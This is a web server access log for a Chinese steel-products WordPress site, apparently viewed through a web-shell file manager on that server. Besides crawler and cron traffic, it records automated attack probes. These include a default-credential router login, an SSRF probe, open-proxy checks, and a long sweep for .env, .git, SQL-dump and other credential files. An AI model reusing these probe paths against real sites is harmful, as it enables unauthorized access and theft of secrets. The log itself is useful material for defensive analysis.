HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: //home/logs/cqqizhou_access_2026-01-05.log
36.133.115.36 - - [05/Jan/2026:00:18:17 +0800] "POST /wp-cron.php?doing_wp_cron=1767543497.0589179992675781250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [05/Jan/2026:00:18:17 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Jan/2026:00:19:54 +0800] "POST /wp-cron.php?doing_wp_cron=1767543594.4251229763031005859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
103.48.64.190 - - [05/Jan/2026:00:19:59 +0800] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 31351 "-" "-"
36.133.115.36 - - [05/Jan/2026:00:31:51 +0800] "POST /wp-cron.php?doing_wp_cron=1767544311.5547978878021240234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
38.46.221.123 - - [05/Jan/2026:00:31:51 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [05/Jan/2026:00:31:52 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 34699 "http://check.9tb.org" "Go-http-client/1.1"
204.76.203.8 - - [05/Jan/2026:00:32:24 +0800] "GET /_next HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
204.76.203.8 - - [05/Jan/2026:00:32:26 +0800] "GET /_next HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:00:54:38 +0800] "POST /wp-cron.php?doing_wp_cron=1767545678.2080330848693847656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
103.19.190.182 - - [05/Jan/2026:00:54:38 +0800] "GET /third-party/res/UEditor/net/controller.ashx?action=catchimage HTTP/1.1" 404 8981 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [05/Jan/2026:00:57:04 +0800] "POST /wp-cron.php?doing_wp_cron=1767545824.2741780281066894531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
40.77.167.79 - - [05/Jan/2026:00:57:04 +0800] "GET /2361/ HTTP/1.1" 200 24993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:01:01:06 +0800] "POST /wp-cron.php?doing_wp_cron=1767546066.7419240474700927734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
40.77.167.79 - - [05/Jan/2026:01:01:07 +0800] "GET /bug/ HTTP/1.1" 200 12820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.247 - - [05/Jan/2026:01:20:41 +0800] "GET /2361/ HTTP/1.1" 200 25013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:01:20:46 +0800] "POST /wp-cron.php?doing_wp_cron=1767547246.2653388977050781250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
40.77.167.59 - - [05/Jan/2026:01:20:46 +0800] "GET /2162/ HTTP/1.1" 200 25162 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:01:35:44 +0800] "POST /wp-cron.php?doing_wp_cron=1767548144.3478319644927978515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
51.68.107.139 - - [05/Jan/2026:01:35:44 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)"
51.68.107.139 - - [05/Jan/2026:01:35:44 +0800] "GET / HTTP/1.1" 200 34699 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)"
36.133.115.36 - - [05/Jan/2026:01:41:41 +0800] "POST /wp-cron.php?doing_wp_cron=1767548501.9274001121520996093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
115.159.33.43 - - [05/Jan/2026:01:41:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:08 +0800] "HEAD / HTTP/1.1" 200 0 "-" "python-requests/2.32.3"
80.94.92.145 - - [05/Jan/2026:01:43:08 +0800] "GET / HTTP/1.1" 200 34699 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:11 +0800] "GET / HTTP/1.1" 200 34699 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:12 +0800] "GET /about/ HTTP/1.1" 200 29977 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:13 +0800] "GET /services/ HTTP/1.1" 200 31631 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:15 +0800] "GET /logistics/ HTTP/1.1" 200 29813 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:22 +0800] "GET /media/ HTTP/1.1" 200 30205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:23 +0800] "GET /contacts/ HTTP/1.1" 200 21722 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:01:43:25 +0800] "POST /wp-cron.php?doing_wp_cron=1767548605.8148128986358642578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
80.94.92.145 - - [05/Jan/2026:01:43:26 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 22081 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:29 +0800] "GET /portfolio-category/cold-rolled-coil/ HTTP/1.1" 200 21138 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:31 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 200 22146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:34 +0800] "GET /portfolio-category/dual-phase-steel/ HTTP/1.1" 200 21130 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:36 +0800] "GET /portfolio/hot-dip-galvanized-coil/ HTTP/1.1" 200 22301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:38 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 21148 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:40 +0800] "GET /portfolio/remaining-rolls/ HTTP/1.1" 200 22158 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:44 +0800] "GET /portfolio-category/remaining-rolls/ HTTP/1.1" 200 21110 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:45 +0800] "GET /services HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:46 +0800] "GET /services/ HTTP/1.1" 200 31631 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:01:43:48 +0800] "POST /wp-cron.php?doing_wp_cron=1767548628.0923700332641601562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
80.94.92.145 - - [05/Jan/2026:01:43:48 +0800] "GET /logistics HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:49 +0800] "GET /logistics/ HTTP/1.1" 200 29813 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:50 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:52 +0800] "GET /2164/ HTTP/1.1" 200 23557 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:55 +0800] "GET /policy/ HTTP/1.1" 200 23833 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:43:57 +0800] "GET /2163/ HTTP/1.1" 200 23828 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
80.94.92.145 - - [05/Jan/2026:01:44:02 +0800] "GET /2162/ HTTP/1.1" 200 25182 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:01:48:13 +0800] "POST /wp-cron.php?doing_wp_cron=1767548893.1945180892944335937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.130.34.74 - - [05/Jan/2026:01:48:13 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Jan/2026:01:55:04 +0800] "POST /wp-cron.php?doing_wp_cron=1767549304.1761078834533691406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
20.98.164.46 - - [05/Jan/2026:01:55:04 +0800] "GET /druid/index.html HTTP/1.1" 404 8982 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [05/Jan/2026:02:07:56 +0800] "POST /wp-cron.php?doing_wp_cron=1767550076.6019079685211181640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [05/Jan/2026:02:07:56 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
38.46.221.123 - - [05/Jan/2026:02:08:40 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [05/Jan/2026:02:08:40 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 34699 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:02:34:03 +0800] "POST /wp-cron.php?doing_wp_cron=1767551643.0376520156860351562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
79.133.126.39 - - [05/Jan/2026:02:34:03 +0800] "GET http://ip-api.com/json/ HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
106.228.48.131 - - [05/Jan/2026:02:37:50 +0800] "GET /1234.php HTTP/1.1" 404 47 "http://cqqizhou.com/1234.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
36.133.115.36 - - [05/Jan/2026:02:39:10 +0800] "POST /wp-cron.php?doing_wp_cron=1767551950.2544920444488525390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.166.131.228 - - [05/Jan/2026:02:39:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.131.228 - - [05/Jan/2026:02:39:13 +0800] "GET / HTTP/1.1" 200 34273 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Jan/2026:02:43:08 +0800] "POST /wp-cron.php?doing_wp_cron=1767552188.3925979137420654296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
64.23.166.152 - - [05/Jan/2026:02:43:08 +0800] "GET /dump.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:10 +0800] "GET /database.sql HTTP/1.1" 404 8980 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:13 +0800] "GET /data.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:16 +0800] "GET /setup.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:19 +0800] "GET /db_backup.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:22 +0800] "GET /db.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
121.43.117.214 - - [05/Jan/2026:02:43:25 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
64.23.166.152 - - [05/Jan/2026:02:43:25 +0800] "GET /db.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:30 +0800] "GET /mysql.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:32 +0800] "GET /dump.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:36 +0800] "GET /backup.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
121.43.117.214 - - [05/Jan/2026:02:43:36 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.43.117.214 - - [05/Jan/2026:02:43:36 +0800] "GET /nmaplowercheck1767552210 HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.117.214 - - [05/Jan/2026:02:43:36 +0800] "POST /sdk HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.117.214 - - [05/Jan/2026:02:43:37 +0800] "GET /evox/about HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.117.214 - - [05/Jan/2026:02:43:37 +0800] "GET /HNAP1 HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
64.23.166.152 - - [05/Jan/2026:02:43:37 +0800] "GET /.env.shared HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:38 +0800] "GET /.env.local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:40 +0800] "GET /.env.backup HTTP/1.1" 404 8980 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:42 +0800] "GET /.env.dev.local HTTP/1.1" 404 8980 "-" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:02:43:46 +0800] "POST /wp-cron.php?doing_wp_cron=1767552226.3823699951171875000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
64.23.166.152 - - [05/Jan/2026:02:43:46 +0800] "GET /docker-compose.yml HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:50 +0800] "GET /docker-compose.env HTTP/1.1" 404 8980 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:55 +0800] "GET /compose.env HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
121.43.117.214 - - [05/Jan/2026:02:43:56 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.43.117.214 - - [05/Jan/2026:02:43:57 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
64.23.166.152 - - [05/Jan/2026:02:43:58 +0800] "GET /.config HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:43:59 +0800] "GET /config/api.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:02 +0800] "GET /config/stripe.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:04 +0800] "GET /.npmrc HTTP/1.1" 404 8982 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:09 +0800] "GET /auth.json HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:10 +0800] "GET /storage/logs/stripe.log HTTP/1.1" 404 8980 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:14 +0800] "GET /.env HTTP/1.1" 404 8982 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:16 +0800] "GET /.env.local HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:20 +0800] "GET /.env.dev HTTP/1.1" 404 8980 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:24 +0800] "GET /.env.production HTTP/1.1" 404 8982 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:32 +0800] "GET /.env.bak HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:35 +0800] "GET /.env.old HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:38 +0800] "GET /.env.save HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:02:44:47 +0800] "POST /wp-cron.php?doing_wp_cron=1767552287.2822589874267578125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
64.23.166.152 - - [05/Jan/2026:02:44:47 +0800] "GET /.env.example HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:47 +0800] "GET /.env.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:48 +0800] "GET /.env.swp HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:53 +0800] "GET /.env~ HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:44:57 +0800] "GET /.env_1 HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:00 +0800] "GET /.env.dist HTTP/1.1" 404 8980 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:04 +0800] "GET /.env.setup HTTP/1.1" 404 8982 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:06 +0800] "GET /.git/config HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:09 +0800] "GET /.git/index HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:13 +0800] "GET /web.env HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:16 +0800] "GET /core/.env HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:20 +0800] "GET /app/.env HTTP/1.1" 404 8980 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:24 +0800] "GET /api/.env HTTP/1.1" 404 8980 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:28 +0800] "GET /src/.env HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:29 +0800] "GET /config/.env HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:37 +0800] "GET /private/.env HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:39 +0800] "GET /web/.env HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:42 +0800] "GET /config/settings.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:44 +0800] "GET /config/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:52 +0800] "GET /config/database.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:55 +0800] "GET /config/app.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:45:58 +0800] "GET /config/services.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:02:46:02 +0800] "POST /wp-cron.php?doing_wp_cron=1767552362.6016759872436523437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
64.23.166.152 - - [05/Jan/2026:02:46:02 +0800] "GET /config/settings.yml HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:05 +0800] "GET /config/database.yml HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:12 +0800] "GET /storage/.env HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:17 +0800] "GET /storage/logs/laravel.log HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:26 +0800] "GET /.vscode/settings.json HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:29 +0800] "GET /web.config HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:29 +0800] "GET /index.html HTTP/1.1" 200 8721 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:31 +0800] "GET /phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:35 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:36 +0800] "GET /test.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:40 +0800] "GET /debug.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:42 +0800] "GET /version.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:02:46:51 +0800] "POST /wp-cron.php?doing_wp_cron=1767552411.4761459827423095703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
64.23.166.152 - - [05/Jan/2026:02:46:51 +0800] "GET /.env.test HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:54 +0800] "GET /config.json HTTP/1.1" 404 8982 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:46:59 +0800] "GET /env.txt HTTP/1.1" 200 19732 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:47:02 +0800] "GET /env.bak HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:47:07 +0800] "GET /backup.html HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:47:08 +0800] "GET /data.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:47:14 +0800] "GET /backup.sql HTTP/1.1" 404 8982 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:47:19 +0800] "GET /db.sql HTTP/1.1" 404 8981 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:47:22 +0800] "GET / HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
64.23.166.152 - - [05/Jan/2026:02:47:29 +0800] "GET / HTTP/1.1" 200 34699 "http://36.133.115.36/" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:03:00:20 +0800] "POST /wp-cron.php?doing_wp_cron=1767553220.1525011062622070312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
206.168.34.52 - - [05/Jan/2026:03:00:20 +0800] "GET /security.txt HTTP/1.1" 200 19734 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [05/Jan/2026:03:02:48 +0800] "POST /wp-cron.php?doing_wp_cron=1767553368.6541640758514404296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.132.153.116 - - [05/Jan/2026:03:02:48 +0800] "GET /sitemap.xml HTTP/1.1" 200 492 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [05/Jan/2026:03:05:35 +0800] "POST /wp-cron.php?doing_wp_cron=1767553535.3224320411682128906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [05/Jan/2026:03:05:35 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
